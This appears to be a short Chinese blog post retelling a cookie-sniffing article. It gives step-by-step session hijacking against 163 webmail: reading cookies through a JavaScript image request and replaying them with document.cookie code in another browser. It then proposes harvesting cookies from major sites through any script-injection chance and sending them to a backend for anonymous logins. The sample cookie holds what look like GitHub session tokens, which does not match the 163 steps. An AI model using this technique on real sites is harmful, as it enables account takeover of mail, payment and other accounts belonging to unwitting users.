首先来一篇好文章,刚好看到的:
沉默中的狂怒 —— Cookie 大喷发---------------- http://www.cnblogs.com/index-html/p/mitm-cookie-sniffer.html#3050493
我就重复一遍啦:
在chrome或者firefox下登陆下163的邮箱;
在控制台执行js:
new Image().src = "http://push.webmail.mail.163.com";
在控制台可以看到发送的的请求的RequestHeader的cookie;
把这段cookie保存下来拉:
打开另一个浏览器,执行这些代码;
var cookie = '_octo=GH1.1.1197126241.1409639170; logged_in=yes; dotcom_user=user; user_session=T0fclMsdfsdfv0eTN3-CsYUm2OQVnkMsdfUZLn8ZXJLwE7BTIwMEAInT9fptAn; tz=Asia%2FShanghai; _ga=GA1.2.68662887.1409639170; _gat=1; _gh_sess=eyJzZXNzaW9uX2lkIjoiYjI5ZGFlZGQwNGIwN2U5ZjAzZmUxZTIyYjY3MjA1NDYiLCJjb250ZXh0IjoiLyIsInJlZmVycmFsX2NvZGUiOiJodHRwczovL2dpdGh1Yi5jb20vIn0%3D--d4f09b50437a537b45adc451dc8319ac36aaf5fa'; //把你获取的cookie放到cookie这个变量去
cookie.split(";").forEach(function(e,i) {
//设置cookie,过期时间为一天;
document.cookie = e+";expired="+new Date(new Date().getTime() + 1000*60*60*24).toGMTString();
});
我们现在再打开mail.163.com;发现登陆进去了;
cookie是用来用户保存在本地的信息;每一个域名或者对应的子域名会保存这些消息,对保存有效期和大小都有限制,后台分配的对应cookie都是唯一的,所以只要cookie匹配,就知道是哪一个用户登陆的。
所以只要用户了用户的cookie就相当于有了进入你邮箱或者支付宝或者等等等等的后门;soGood;
也就是说只要在网页中有任何可以执行JS的机会都可以利用
new Image().src = "http://push.webmail.mail.163.com;
new Image().src = "http://www.baidu.com";
遍历常见的比较大的网站,然后把劫持的cookie发送到后台, 我们就可以进行匿名登陆了. so Nice;
算是复习一遍吧;